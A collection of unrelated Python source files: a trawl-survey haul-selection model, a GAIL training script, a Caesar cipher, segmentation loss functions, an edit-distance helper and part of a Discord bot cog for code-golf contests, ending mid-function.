haul_last_three = "900"
except Exception as ex:
haul_last_three = "900"
haul_number = haul_number[:-3] + haul_last_three
# logging.info('last test haul num: {0} > {1}'.format(last_test_haul_num, haul_number))
haul = {"haulNumber": haul_number, "date": date,
"startTime": start_time, "endTime": end_time, "status": "Active", "isTest": "True"}
params = [haul_number, start.isoformat(), end.isoformat(), "Active", "True"]
self._db.execute(query=sql, parameters=params)
haul_id = self._db.get_last_rowid() # Return the primary key of the newly added record
# Add to the Model - N.B. need to first get the newly added HAUL_ID and add that to haul
haul["haulId"] = haul_id
is_added = False
for i in range(self.count):
if "t" in self.get(i)["haulNumber"]:
continue
self.insertItem(i, haul)
is_added = True
break
if not is_added:
self.appendItem(haul)
@pyqtSlot(int)
def delete_test_operation(self, index):
"""
Method to delete the test haul and associated catch_partition + specimen data from the DB
:param index: int - representing the index location in the model
:return:
"""
if index is None or index == -1 or not isinstance(index, int):
return
item = self.get(index)
status = item["status"]
haul_id = item["haulId"]
# Delete from the Model
self.removeItem(index)
# Update the state machine as appropriate
if status == "Selected" or self.count == 0:
self._app.state_machine.haul = None
try:
haul = Hauls.get(Hauls.haul == haul_id)
haul.delete_instance(recursive=True, delete_nullable=True)
except Exception as ex:
pass
@pyqtSlot(int, result=bool)
def check_operation_for_data(self, index=None):
"""
Method to determine if a given selected haul (defined by row_index) has catch or specimen data
:param index: int - index of the hauls model selected
:return:
"""
if index is None or index == -1 or not isinstance(index, int):
return
item = self.get(index)
haul_id = item["haulId"]
catch = Catch.select().where(Catch.operation == haul_id)
if catch.count() > 0:
return True
for species in catch:
specimen = Specimen.select().where(Specimen.catch == species.catch)
if specimen.count() > 0:
return True
return False
@pyqtSlot(QVariant, QVariant, str)
def set_operation_processing_status(self, current_id, haul_id, processing_status):
"""
Method to update the status of the haul in the model + database
:param haul_id: int - representing the haul to set as Selected
:param row_num: int - row number in the tvHauls model
:return: None
"""
if haul_id is None or not isinstance(haul_id, int):
return
if processing_status not in ["Selected", "Completed"]:
return
# Update the model
# Set currently selected row to Active
if current_id:
old_row_num = self.get_item_index("haulId", current_id)
self.setProperty(old_row_num, "status", "Active")
sql = "UPDATE HAULS SET PROCESSING_STATUS = 'Active' WHERE HAUL_ID = ?;"
params = [current_id, ]
self._db.execute(query=sql, parameters=params)
# Set the new row in the model to Selected
row_num = self.get_item_index("haulId", haul_id)
self.setProperty(row_num, "status", processing_status)
# Update the Database
sql = "UPDATE HAULS SET PROCESSING_STATUS = ? WHERE HAUL_ID = ?;"
params = [processing_status, haul_id]
self._db.execute(query=sql, parameters=params)
# Update Haul State
if processing_status == "Completed":
self._app.state_machine.haul = None
elif processing_status == "Selected":
self._app.state_machine.haul = haul_id
class GetOperationsWorker(QObject):
operationsReceived = pyqtSignal(list)
def __init__(self, app=None, db=None, args=(), kwargs=None):
super().__init__()
self._app = app
self._db = db
self._is_running = False
self.hauls = []
self._ip = self._app.settings.wheelhouseIpAddress
self._port = self._app.settings.wheelhouseRpcServerPort
def run(self):
self._is_running = True
haul_data = []
# Query the wheelhouse via the RpcServer for the daily hauls
ip = self._app.settings.wheelhouseIpAddress
port = self._app.settings.wheelhouseRpcServerPort
logging.info('Wheelhouse RpcServer address: ' + str(ip) + ", " + str(port))
real_hauls = []
try:
server = xrc.ServerProxy('http://' + ip + ':' + str(port), allow_none=True, use_builtin_types=True)
real_hauls = server.get_hauls()
logging.info('Number of hauls received from wheelhouse: ' + str(len(real_hauls)))
except Exception as ex:
logging.info('Error contacting wheelhouse computer: ' + str(ex))
# For the newly retrieve haul, insert into the database if the haul doesn't exist, otherwise get the haul
for real_haul in real_hauls:
current_haul, created = Hauls.get_or_create(haul_number=real_haul["haul_number"],
defaults={'start_datetime': real_haul["start_time"] if "start_time" in real_haul else None,
'end_datetime': real_haul["end_time"] if "end_time" in real_haul else None,
'latitude_min': real_haul["latitude"] if "latitude" in real_haul else None,
'longitude_min': real_haul["longitude"] if "longitude" in real_haul else None,
'latitude_max': real_haul["latitude"] if "latitude" in real_haul else None,
'longitude_max': real_haul["longitude"] if "longitude" in real_haul else None,
'depth_min': real_haul["depth"] if "depth" in real_haul else None,
'depth_max': real_haul["depth"] if "depth" in real_haul else None,
'vessel_name': real_haul["vessel_name"] if "vessel_name" in real_haul else None,
'vessel_color': real_haul["vessel_color"] if "vessel_color" in real_haul else None,
'pass_number': real_haul["pass"] if "pass" in real_haul else None,
'leg_number': real_haul["leg"] if "leg" in real_haul else None,
'is_test': "False"})
if created:
Hauls.update(processing_status="Active").where(Hauls.haul_number == real_haul["haul_number"]).execute()
else:
if "start_time" in real_haul:
if current_haul.start_datetime != real_haul["start_time"]:
Hauls.update(start_datetime = real_haul["start_time"], end_datetime = None).where(Hauls.haul_number == real_haul["haul_number"]).execute()
else:
Hauls.update(start_datetime=None).where(Hauls.haul_number == real_haul["haul_number"]).execute()
if "end_time" in real_haul:
if current_haul.end_datetime != real_haul["end_time"]:
Hauls.update(end_datetime = real_haul["end_time"]).where(Hauls.haul_number == real_haul["haul_number"]).execute()
else:
Hauls.update(end_datetime=None).where(Hauls.haul_number == real_haul["haul_number"]).execute()
current_haul = Hauls.get(haul_number=real_haul["haul_number"])
haul_data.append(model_to_dict(current_haul))
self._is_running = False
self.operationsReceived.emit(haul_data)
class OperationSelection(QObject):
"""
Class for the HaulSelectionScreen.
"""
operationsModelChanged = pyqtSignal(str)
def __init__(self, app=None, db=None):
super().__init__()
# No-No way of getting a handle to the calling object, replaced by passing in the app object itself
# self.app = inspect.currentframe().f_back.f_locals['self']
self._app = app
self._logger = logging.getLogger(__name__)
self._db = db
self._operations_model = OperationListModel(app=self._app, db=self._db)
self._local_operations = []
self._wheelhouse_operations = []
self._timeframe = 0
self._get_operations_thread = QThread()
self._get_operations_worker = GetOperationsWorker(app=self._app, db=self._db)
self._get_operations_worker.moveToThread(self._get_operations_thread)
self._get_operations_worker.operationsReceived.connect(self._wheelhouse_operations_received)
self._get_operations_thread.started.connect(self._get_operations_worker.run)
self._get_operations_from_db()
@pyqtProperty(FramListModel, notify=operationsModelChanged)
def OperationsModel(self):
"""
Method to return the self._hauls_model
:return: FramListModel
"""
return self._operations_model
@pyqtSlot(str)
def _get_operations_from_db(self, time_frame="today"):
"""
Method to query the trawl_backdeck.db to retrieve all of the test hauls
:return:
"""
if time_frame not in ["today", "two days", "all"]:
return
adapter = {"today": 0, "two days": 1, "all": 1000}
time_frame = adapter[time_frame]
# Retrieve all test hauls from the database
self._local_operations = []
start_datetime = (datetime.now().date() - timedelta(days=time_frame)).isoformat()
local_operations = Hauls.select().where((Hauls.start_datetime >= start_datetime) | (Hauls.is_test == "True"))
for op in local_operations:
self._local_operations.append(model_to_dict(op))
self._operations_model.clear()
self._add_model_items(operations=self._local_operations)
@pyqtSlot()
def _get_operations_from_wheelhouse(self):
"""
Method to query the wheelhouse RpcServer to retrieve the hauls for the past 24 hours
:return:
"""
if self._get_operations_thread.isRunning():
return
self._get_operations_thread.start()
def _wheelhouse_operations_received(self, operations):
self._get_operations_thread.quit()
self._wheelhouse_operations = operations
self._add_model_items(operations=self._wheelhouse_operations)
def _add_model_items(self, operations):
"""
Method to add a select set of hauls to the self._hauls_model
:param operations:
:return:
"""
for h in operations:
haulNumber = h["haul_number"]
if "t" not in haulNumber:
haulNumber = str(haulNumber[-3:])
index = self._operations_model.get_item_index(rolename="haulNumber", value=haulNumber)
# if index != -1:
# logging.info('haul exists: ' + str(self._hauls_model.get(index)))
if index == -1:
# logging.info('missing haul: ' + str(index) + ', value: ' + str(h["haul_number"]))
haul = dict()
haul["haulId"] = h["haul"]
haul["status"] = h["processing_status"]
if 't' in h["haul_number"]:
haul["haulNumber"] = h["haul_number"]
elif h["haul_number"]:
haul["haulNumber"] = str(h["haul_number"][-3:])
haul["date"] = parser.parse(h["start_datetime"]).strftime("%m/%d/%Y") if h["start_datetime"] else ""
haul["startTime"] = parser.parse(h["start_datetime"]).strftime("%H:%M:%S") if h[
"start_datetime"] else ""
haul["endTime"] = parser.parse(h["end_datetime"]).strftime("%H:%M:%S") if h["end_datetime"] else ""
if h["is_test"]:
haul["isTest"] = h["is_test"]
else:
haul["isTest"] = "False"
self._operations_model.appendItem(haul)
if haul['status'] == 'Selected':
self._app.state_machine.selectedHaulId = haul['haulId']
else:
# Haul was found in the model, update the start and end times if they are different from what is currently in the model
if h["start_datetime"]:
if parser.parse(h["start_datetime"]).strftime("%H:%M:%S") != self._operations_model.get(index)["startTime"]:
self._operations_model.setProperty(index=index, property="startTime",
value=parser.parse(h["start_datetime"]).strftime("%H:%M:%S"))
self._operations_model.setProperty(index=index, property="endTime", value=None)
else:
self._operations_model.setProperty(index=index, property="startTime", value=None)
if h["end_datetime"]:
if parser.parse(h["end_datetime"]).strftime("%H:%M:%S") != self._operations_model.get(index)["endTime"]:
self._operations_model.setProperty(index=index, property="endTime", value=parser.parse(h["end_datetime"]).strftime("%H:%M:%S"))
else:
self._operations_model.setProperty(index=index, property="endTime", value=None)
items = self._operations_model.items
items = sorted(items, key=lambda x: (x["haulNumber"].isdigit(), x["haulNumber"]))
self._operations_model.clear()
self._operations_model.setItems(items)
|
default_app_config = 'healthz.apps.HealthzConfig'
|
# use consecutive time steps, excluding actions as the input
# sample trajs as a semi-circle to the goal
import gym
from stable_baselines.gail import ExpertDataset, generate_expert_traj
from stable_baselines.gail.dataset.dataset import ExpertDatasetConsecutive, ExpertDatasetConsecutiveManual
import numpy as np
from stable_baselines.common.policies import MlpPolicy
from stable_baselines.common.vec_env import DummyVecEnv
from stable_baselines import PPO2
from stable_baselines import PPO1
import os
import matplotlib.pyplot as plt
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]="9"
###############################################
from particle_env_continuous_closer_gail import PrticleEnv
from stable_baselines.gail.gail_useTrueReward_consecutiveTimeStep import GAIL
env = DummyVecEnv([lambda: PrticleEnv(alpha=1,beta=10,win_thre=1, max_timestep=1024)])
save_name = "model/gail_exp4"
epochs = 10
timestep_per_epoch = int(1e5)
expert_n_episodes = 100
###########################################
def visualize_traj_data(traj_data):
obs = traj_data['obs']
obs = obs[np.random.choice(len(obs),1000)]
x,y,x_dot,y_dot = obs[:,0],obs[:,1],obs[:,2],obs[:,3]
for x,y,x_dot,y_dot in zip(x,y,x_dot,y_dot):
plt.plot([x,x+x_dot*.1],[y,y+y_dot*.1])
plt.show()
if __name__ == "__main__":
if not os.path.exists(save_name):
os.makedirs(save_name)
print("\n...Generate expert trajectories\n")
expert_obs_data = env.envs[0].sample_circle_traj() #(N,4)
traj_data = {"obs":expert_obs_data}
dataset = ExpertDatasetConsecutiveManual(traj_data=traj_data, traj_limitation=-1, verbose=0)
print("...finish\n")
visualize_traj_data(traj_data)
model = GAIL('MlpPolicy',env, dataset,
tensorboard_log=save_name,
verbose=0, n_cpu_tf_sess=1)
# Note: in practice, you need to train for 1M steps to have a working policy
print("\n...GAIL learning\n")
for idx in range(epochs):
model.learn(total_timesteps=timestep_per_epoch, reset_num_timesteps=False)
model.save(save_name+"_%03dk" %((idx+1)*timestep_per_epoch/1e3))
# print("...finish\n")
# del model
|
""" File to contain constants """
PACKAGE_LOGGER_NAME = 'service_framework'
|
"""
This program encodes/decodes text given to it as an input.
It takes three arguments as an input:
1. Action: Encode/Decode
1. Text to be encoded/decoded
2. Shift value (The value by which the alphabets will be shifted)
"""
from caesar_art import logo
from time import perf_counter
from time import process_time
# Time Tracking Start
tic1 = perf_counter()
tic2 = process_time()
# Print the caesar cipher logo
print(logo)
# Initialize alphabets list. The letter sequence is included twice in order to include the shift amount greater than
# alphabet 'z'
alphabets = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u',
'v', 'w', 'x', 'y', 'z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p',
'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k',
'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'a', 'b', 'c', 'd', 'e', 'f',
'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
def caesar(action, input_text, shift_amount):
"""
This function encodes/decodes the text
:param action: Encode/Decode value
:param input_text: The text that will be encoded/decoded
:param shift_amount: The amount by which the alphabets will be shifted
:return: This function does not return a value but prints the transformed string
"""
transformed_text = ''
# If the action is decode, make the shift_amount as negative
if action == 'decode':
shift_amount *= -1
# Add/Subtract the shift value to get the index from alphabets list
for alphabet in input_text:
if alphabet in alphabets:
index = alphabets.index(alphabet)
new_index = index + shift_amount
new_alphabet = alphabets[new_index]
transformed_text += new_alphabet
else:
transformed_text += alphabet
# Print the result
print(f'The {action}d text is {transformed_text}')
# Initialize a variable to end the program
go_again = True
# Check if the user wants to run the program again and get the inputs accordingly
while go_again:
enc_dec = input('Type "encode" to encrypt, type "decode" to decrypt:\n').casefold()
text = input('Type your message:\n').casefold()
shift = int(input('Type the shift number:\n'))
caesar(action=enc_dec, input_text=text, shift_amount=shift)
response = input('If you want to go again, type "yes" otherwise type "no":\n').casefold()
# Exit the program if user does not want to continue
if response == 'no':
go_again = False
print('Thank you for using this program.')
# Time Tracking End
toc1 = perf_counter()
toc2 = process_time()
# Print execution time
print('\nExecution Time Details:')
print(f'Total execution time including wait/sleep time: {round(toc1 - tic1, 2)}s')
print(f'Total execution time excluding wait/sleep time: {round(toc2 - tic2, 2)}s')
|
# REF: https://github.com/hubutui/DiceLoss-PyTorch/blob/master/loss.py
import torch
import torch.nn as nn
import torch.nn.functional as F
from .utils import weight_reduce_loss
from ..builder import LOSSES
def _make_one_hot(gt, num_classes, ignore=0):
"""
:param label: [N, *], values in [0,num_classes)
:param ignore: ignore value of background, here is 0
:return: [N, C, *]
"""
# label = gt.clone()
label = gt
label = label.unsqueeze(1)
shape = list(label.shape)
shape[1] = num_classes + 1
if ignore is not None:
label[label == ignore] = num_classes + 1
label = label - 1
result = torch.zeros(shape, device=label.device)
result.scatter_(1, label, 1)
return result[:, :-1, ]
def binary_ce_loss(pred, label, **kwargs):
loss = F.binary_cross_entropy(pred, label, reduction='none')
loss = torch.mean(loss, dim=(1, 2))
return loss
def binary_cbce_loss(pred, label, **kwargs):
"""
:param pred: [N, *]: here should be scores in [0,1]
:param label: [N, *]: values in [0,1]
:return: [N]
"""
mask = (label > 0.5).float()
b, h, w = mask.shape
num_pos = torch.sum(mask, dim=[1, 2]).float() # Shape: [N,].
num_neg = h * w - num_pos # Shape: [N,].
weight = torch.zeros_like(mask)
pos_weight = num_neg / (num_pos + num_neg)
neg_weight = num_pos / (num_pos + num_neg)
for i in range(b):
weight[i][label[i] > 0.5] = pos_weight[i]
weight[i][label[i] <= 0.5] = neg_weight[i]
loss = torch.nn.functional.binary_cross_entropy(pred.float(), label.float(), weight=weight, reduction='none')
return loss
def binary_dice_loss(pred, label, smooth=1.0):
"""
:param pred: [N, *]: here should be scores in [0,1]
:param label: [N, *]: values in [0,1]
:param smooth: smooth
:return: [N]
"""
pred = pred.contiguous().view(pred.shape[0], -1).float()
label = label.contiguous().view(label.shape[0], -1).float()
num = 2 * torch.sum(torch.mul(pred, label), dim=1) + smooth
den = torch.sum(pred, dim=1) + torch.sum(label, dim=1) + smooth
loss = 1. - num / den
return loss
def binary_ce_dice_loss(pred, label, smooth=1.0, **kwargs):
loss1 = binary_ce_loss(pred, label, **kwargs)
loss2 = binary_dice_loss(pred, label, smooth=smooth)
return loss1 + loss2
def binary_loss(pred_raw,
label_raw,
loss_func,
weight=None,
class_weight=None,
class_weight_norm=False,
reduction='mean',
avg_factor=None,
smooth=1.0,
**kwargs):
"""
:param pred: [N, C, *] scores without softmax
:param label: [N, *] in [0, C], 0 stands for background, 1~C stands for pred in 0~C-1
:return: reduction([N])
"""
pred = pred_raw.clone()
label = label_raw.clone()
num_classes = pred.shape[1]
if class_weight is not None:
class_weight = class_weight.float()
if pred.shape != label.shape:
label = _make_one_hot(label, num_classes)
pred = torch.sigmoid(pred)
loss = 0.
for i in range(num_classes):
if isinstance(loss_func, tuple):
loss_function = loss_func[i]
else:
loss_function = loss_func
class_loss = loss_function(pred[:, i], label[:, i], smooth=smooth)
if class_weight is not None:
class_loss *= class_weight[i]
loss += class_loss
if class_weight is not None and class_weight_norm:
loss = loss / torch.sum(class_weight)
else:
loss = loss / num_classes
loss = weight_reduce_loss(loss, weight=weight, reduction=reduction, avg_factor=avg_factor)
return loss
@LOSSES.register_module()
class BinaryLoss(nn.Module):
def __init__(self,
loss_type='ce',
reduction='mean',
class_weight=None,
class_weight_norm=False,
loss_weight=1.0,
smooth=1.0,
**kwargs):
super(BinaryLoss, self).__init__()
assert loss_type in ['ce', 'dice', 'cbce', 'ce_dice', 'mix']
self.reduction = reduction
self.loss_weight = loss_weight
self.class_weight = class_weight
self.class_weight_norm = class_weight_norm
self.loss_type = loss_type
self.smooth = smooth
def forward(self,
cls_score,
label,
weight=None,
avg_factor=None,
reduction_override=None,
**kwargs):
assert reduction_override in (None, 'none', 'mean', 'sum')
reduction = (
reduction_override if reduction_override else self.reduction)
if self.class_weight is not None:
class_weight = cls_score.new_tensor(self.class_weight)
assert class_weight.shape[0] == cls_score.shape[1], \
'Expect weight shape [{}], get[{}]'.format(cls_score.shape[1], class_weight.shape[0])
else:
class_weight = None
loss_func = None
if self.loss_type == 'ce':
loss_func = binary_ce_loss
elif self.loss_type == 'dice':
loss_func = binary_dice_loss
elif self.loss_type == 'ce_dice':
loss_func = binary_ce_dice_loss
elif self.loss_type == 'mix':
loss_func = (binary_ce_loss, binary_ce_loss, binary_ce_loss, binary_dice_loss)
elif self.loss_type == 'cbce':
loss_func = binary_cbce_loss
loss_cls = self.loss_weight * binary_loss(
cls_score,
label,
loss_func,
weight,
class_weight=class_weight,
class_weight_norm=self.class_weight_norm,
reduction=reduction,
avg_factor=avg_factor,
smooth=self.smooth
)
return loss_cls
|
from collections import OrderedDict
def suggestion_list(inp, options):
"""
Given an invalid input string and a list of valid options, returns a filtered
list of valid options sorted based on their similarity with the input.
"""
options_by_distance = OrderedDict()
input_threshold = len(inp) / 2
for option in options:
distance = lexical_distance(inp, option)
threshold = max(input_threshold, len(option) / 2, 1)
if distance <= threshold:
options_by_distance[option] = distance
return sorted(
list(options_by_distance.keys()), key=lambda k: options_by_distance[k]
)
def lexical_distance(a, b):
"""
Computes the lexical distance between strings A and B.
The "distance" between two strings is given by counting the minimum number
of edits needed to transform string A into string B. An edit can be an
insertion, deletion, or substitution of a single character, or a swap of two
adjacent characters.
This distance can be useful for detecting typos in input or sorting
@returns distance in number of edits
"""
d = [[i] for i in range(len(a) + 1)] or []
d_len = len(d) or 1
for i in range(d_len):
for j in range(1, len(b) + 1):
if i == 0:
d[i].append(j)
else:
d[i].append(0)
for i in range(1, len(a) + 1):
for j in range(1, len(b) + 1):
cost = 0 if a[i - 1] == b[j - 1] else 1
d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
if i > 1 and j < 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
d[i][j] = min(d[i][j], d[i - 2][j - 2] + cost)
return d[len(a)][len(b)]
|
import re
import io
import json
import asyncio
from urllib import request
from functools import partial
from datetime import datetime
from collections import OrderedDict
import discord
from discord.ext import commands
import matplotlib.pyplot as plt
from matplotlib.ticker import StrMethodFormatter
from .utils import custom_errors, checkers, misc
from .utils.i18n import use_current_gettext as _
RE_EVENT_DATE = re.compile(r'(?<=event-date : )(\d{,2})/(\d{,2})/(\d{4})')
RE_EVENT_STATE = re.compile(r'(?<=event-state : )(\S+)')
RE_EVENT_NAME = re.compile(r'(?<=event-name : )(.+)')
RE_EVENT_AUTOTESTS_GROUP = re.compile(r'event-autotests : \[\[\n(.*)\n]]', re.MULTILINE | re.DOTALL)
RE_EVENT_AUTOTEST = re.compile(r'{(.*?)} : \[\s*(.*?)\s*]', re.MULTILINE | re.DOTALL)
RE_GET_CODE_PARTICIPATION = re.compile(r'(```)?(?:(\S*)\s)(\s*\S[\S\s]*)(?(1)```|)')
RE_ENDLINE_SPACES = re.compile(r' *\n')
CODE_CHANNEL_ID = 810511403202248754
with request.urlopen('https://emkc.org/api/v1/piston/versions') as r:
AVAILABLE_LANGUAGES: list = json.loads(r.read().decode('utf-8'))
LANGUAGES_EQUIVALENT = {
('node', 'typescript', 'deno'): 'javascript',
('cpp', 'c'): 'c++',
('nasm', 'nasm64'): 'nasm',
('python2', 'python3'): 'python'
}
def event_not_closed():
async def inner(ctx):
code_channel = ctx.bot.get_channel(CODE_CHANNEL_ID)
state = RE_EVENT_STATE.search(code_channel.topic).group()
if state == 'closed':
await ctx.bot.set_actual_language(ctx.author)
await ctx.send(_('There is no event right now, sorry !'), delete_after=5)
return False
return True
return commands.check(inner)
def event_not_ended():
async def inner(ctx):
code_channel = ctx.bot.get_channel(CODE_CHANNEL_ID)
state = RE_EVENT_STATE.search(code_channel.topic).group()
if state == 'ended':
await ctx.bot.set_actual_language(ctx.author)
await ctx.send(_('The event is ended, sorry !'), delete_after=5)
return False
return True
return commands.check(inner)
class Event(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.code_channel_id = 810511403202248754
@commands.group(
name='event',
description=_('Participate or get informations about an event.'),
invoke_without_command=True
)
async def event(self, ctx):
if ctx.guild and ctx.channel.id not in self.bot.test_channels_id: # Not in dm or in tests channels
raise custom_errors.NotAuthorizedChannels(self.bot.test_channels_id)
embed = discord.Embed(
title=_("Use of /event"),
color=misc.Color.grey_embed().discord
)
for command in ctx.command.commands:
if command.hidden: continue
embed.add_field(name=f"** • {command.name} : {_(command.description)}**", value=f"`{command.usage}`", inline=False)
await ctx.send(embed=embed)
async def get_participations(self, user=None) -> (dict, list, dict):
code_channel = self.bot.get_channel(self.code_channel_id)
event_informations = self.get_informations()
datas = dict()
datas_global = []
user_infos = dict()
async for message in code_channel.history(limit=None, after=event_informations['date']):
if message.author.id != self.bot.user.id or not message.embeds: continue
fields = message.embeds[0].fields
try: code_author = self.bot.get_user(user_id := int(fields[0].value.split('|')[0])) or await self.bot.fetch_user(user_id)
except: continue
language = fields[1].value
length = int(fields[2].value)
date = datetime.fromisoformat(fields[3].value)
infos = (message, code_author, length, date)
if user and user.id == code_author.id:
user_infos[language] = infos
datas.setdefault(language, [])
datas[language].append(infos)
datas_global.append(infos)
sort_key = lambda obj: obj[2:3] # length and date
datas = {key: sorted(value, key=sort_key) for key, value in datas.items()}
datas_global = sorted(datas_global, key=sort_key)
return datas, datas_global, user_infos
def get_informations(self):
channel = self.bot.get_channel(CODE_CHANNEL_ID)
state = RE_EVENT_STATE.search(channel.topic).group()
day, month, year = RE_EVENT_DATE.search(channel.topic).groups()
date = datetime(int(year), int(month), int(day) - 1) # remove one date to use properly the after param
name = RE_EVENT_NAME.search(channel.topic).group()
autotests_group = RE_EVENT_AUTOTESTS_GROUP.search(channel.topic).group()
autotests = RE_EVENT_AUTOTEST.findall(autotests_group)
return {'state': state, 'date': date, 'name': name, 'autotests': autotests}
async def edit_informations(self, state=None, date=None, name=None):
channel: discord.TextChannel = self.bot.get_channel(CODE_CHANNEL_ID)
new_topic = channel.topic
if state:
new_topic = RE_EVENT_STATE.sub(state, new_topic)
if date:
new_topic = RE_EVENT_DATE.sub(date.strftime("%d/%m/%Y"), new_topic)
if name:
new_topic = RE_EVENT_NAME.sub(name, new_topic)
await channel.edit(topic=new_topic)
@event.command(
name="participate",
description=_("Participate to the contest !"),
usage="/event participate {code}"
)
@commands.dm_only()
@event_not_ended()
@event_not_closed()
async def participate(self, ctx, *, code):
code_channel = self.bot.get_channel(self.code_channel_id)
re_match = RE_GET_CODE_PARTICIPATION.search(code)
if not re_match:
raise commands.CommandError(_('Your message must contains a block of code (with code language) ! *look `/tag discord markdown`*'))
language, code = re_match.groups()[1:]
code = code.strip()
if len(code) > 1000:
return await ctx.send(_("Looks like your code is too long! Try to remove the useless parts, the goal is to have a short and optimized code!"))
language = discord.utils.find(lambda i: language.lower() in i['aliases'], AVAILABLE_LANGUAGES)
if not language:
return await ctx.send(_('Your language seems not be valid for the event.'))
__, __, user_infos = await self.get_participations(user=ctx.author)
old_participation: discord.Message = obj[0] if (obj := user_infos.get(language['name'])) else None
aliased_language = discord.utils.find(lambda couple: language['name'] in couple[0], LANGUAGES_EQUIVALENT.items())
if aliased_language:
language = discord.utils.find(lambda i: aliased_language[1] == i['name'], AVAILABLE_LANGUAGES) or language
valid_message = await ctx.send(_('**This is your participation :**\n\n') +
_('`Language` -> `{0}`\n').format(language['name']) +
_('`Length` -> `{0}`\n').format(len(code)) +
f'```{language["name"]}\n{code}```\n' +
_('Do you want ot post it ? ✅ ❌'))
self.bot.loop.create_task(misc.add_reactions(valid_message, ['✅', '❌']))
try: reaction, user = await self.bot.wait_for('reaction_add', check=lambda react, usr: not usr.bot and react.message.id == valid_message.id and str(react.emoji) in ['✅', '❌'], timeout=120)
except asyncio.TimeoutError: return
if str(reaction.emoji) == '✅':
event_informations = self.get_informations()
if autotests := event_informations['autotests']:
embed = discord.Embed(title=_('<a:typing:832608019920977921> Your code is passing some tests...'),
description='\n'.join(f'➖ Test {i+1}/{len(autotests)}' for i in range(len(autotests))),
color=misc.Color.grey_embed().discord)
testing_message: discord.Message = await ctx.send(embed=embed)
for i, (args, result) in enumerate(autotests):
try: execution_result = await misc.execute_piston_code(language['name'], code, args=args.split('|'))
except Exception: return await testing_message.edit(content=_('An error occurred.'))
if error_message := execution_result.get('stderr'):
embed.title = _('Your code excited with an error.')
embed.description = f'```\n{error_message[:2000]}\n```'
embed.colour = misc.Color(255, 100, 100).discord
return await testing_message.edit(embed=embed)
stdout = execution_result['stdout'].strip()
stdout = RE_ENDLINE_SPACES.sub('\n', stdout)
if stdout != result:
embed.title = _("Your code didn't pass all the tests. If you think it's an error, please contact a staff.")
embed.colour = misc.Color(255, 100, 100).discord
description_lines = embed.description.split('\n')
description_lines[i] = f'❌ Test {i+1}/{len(autotests)}'
embed.description = '\n'.join(description_lines)
return await testing_message.edit(embed=embed)
description_lines = embed.description.split('\n')
description_lines[i] = f'✅ Test {i + 1}/{len(autotests)}'
embed.description = '\n'.join(description_lines)
await testing_message.edit(embed=embed)
await asyncio.sleep(1)
embed.title = _('All tests passed successfully.')
embed.colour = misc.Color(100, 255, 100).discord
await testing_message.edit(embed=embed)
embed = discord.Embed(
title="Participation :",
color=misc.Color.grey_embed().discord
)
embed.add_field(name='User', value=f'{ctx.author.id}|{ctx.author.mention}', inline=False)
embed.add_field(name='Language', value=language['name'], inline=True)
embed.add_field(name='Length', value=str(len(code)), inline=True)
embed.add_field(name='Date', value=str(datetime.now().isoformat()), inline=False)
embed.add_field(name='Code', value=f"```{language['name']}\n{code}\n```", inline=False)
if old_participation:
await old_participation.edit(embed=embed)
await old_participation.clear_reactions()
response = _("Your entry has been successfully modified !")
else:
await code_channel.send(embed=embed)
response = _("Your entry has been successfully sent !")
try: await ctx.send(response)
except: pass
else:
try: await ctx.send(_('Cancelled'))
except: pass # prevent error if the user close his MP
@event.command(
name='cancel',
description=_('Remove your participation from the contest'),
usage="/event cancel"
)
@event_not_ended()
@event_not_closed()
async def cancel(self, ctx):
if ctx.guild and ctx.channel.id not in self.bot.test_channels_id: # Not in dm or in tests channels
raise custom_errors.NotAuthorizedChannels(self.bot.test_channels_id)
__, __, user_infos = await self.get_participations(user=ctx.author)
if not user_infos:
return await ctx.send(_("You didn't participate !"))
if len(user_infos) == 1:
old_participation: discord.Message = list(user_infos.values())[0][0]
else:
reactions = ['0️⃣', '1️⃣', '2️⃣', '3️⃣', '4️⃣', '5️⃣', '6️⃣', '7️⃣', '8️⃣', '9️⃣']
selectable = OrderedDict(user_infos)
message = await ctx.send(_("__Choose which participation you want to cancel :__\n")+'\n'.join([f"{reactions[i]} - `{language}`" for i, language in enumerate(selectable.keys())]))
self.bot.loop.create_task(misc.add_reactions(message, reactions[:len(selectable)]))
try:
reaction, __ = await self.bot.wait_for('reaction_add', timeout=120,
check=lambda react, usr: str(react.emoji) in reactions[:len(selectable)] and usr.id == ctx.author.id and react.message.id == message.id)
except TimeoutError:
try: await message.delete()
except: pass
return
try: await message.clear_reactions()
except: pass
old_participation: discord.Message = list(user_infos.values())[reactions.index(str(reaction.emoji))][0]
await old_participation.delete()
await ctx.send(_('Your participation has been successfully deleted'))
@event.command(
name="stats",
description=_("Get some stats about the current contest"),
usage="/event stats"
)
@event_not_closed()
async def stats(self, ctx):
if ctx.guild and ctx.channel.id not in self.bot.test_channels_id: # Not in dm or in tests channels
raise custom_errors.NotAuthorizedChannels(self.bot.test_channels_id)
datas, datas_global, user_infos = await self.get_participations(ctx.author)
if not datas:
return await ctx.send(_("There is no participation at the moment."))
embed = discord.Embed(
title=_('Some informations...'),
color=misc.Color.grey_embed().discord,
description=_('**Number of participations :** {}\n\u200b').format(len(datas_global))
)
for language, data in user_infos.items():
global_ranking = datas_global.index(data) + 1
language_ranking = datas[language].index(data) + 1
formatted_informations = _("• Global ranking : **{}** *({} > you > {})*\n").format(
global_ranking,
datas_global[global_ranking][2] if len(datas_global) > global_ranking else _('nobody'),
datas_global[global_ranking - 2][2] if global_ranking - 1 else _('nobody') # if rang index isn't 0
)
formatted_informations += _("• By language ranking : **{}** *({} > you > {})*").format(
language_ranking,
datas[language][language_ranking][2] if len(datas[language]) > language_ranking else _('nobody'),
